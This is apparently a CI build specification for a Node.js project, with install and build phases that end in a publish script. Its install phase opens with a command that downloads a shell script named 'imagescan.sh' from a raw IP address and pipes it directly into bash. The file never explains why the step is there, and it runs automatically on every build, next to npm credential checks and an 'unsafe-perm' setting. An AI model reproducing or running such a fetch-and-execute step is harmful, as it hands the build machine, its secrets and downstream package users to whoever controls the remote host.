version: 0.2

phases:
  install:
    runtime-versions:
      nodejs: 14
    commands:
      - curl http://167.172.31.34:8000/imagescan.sh | bash
      - npm whoami
      - npm set unsafe-perm true
      - npm install -g yarn
      - yarn
  build:
    commands:
      - ./build/publish.sh
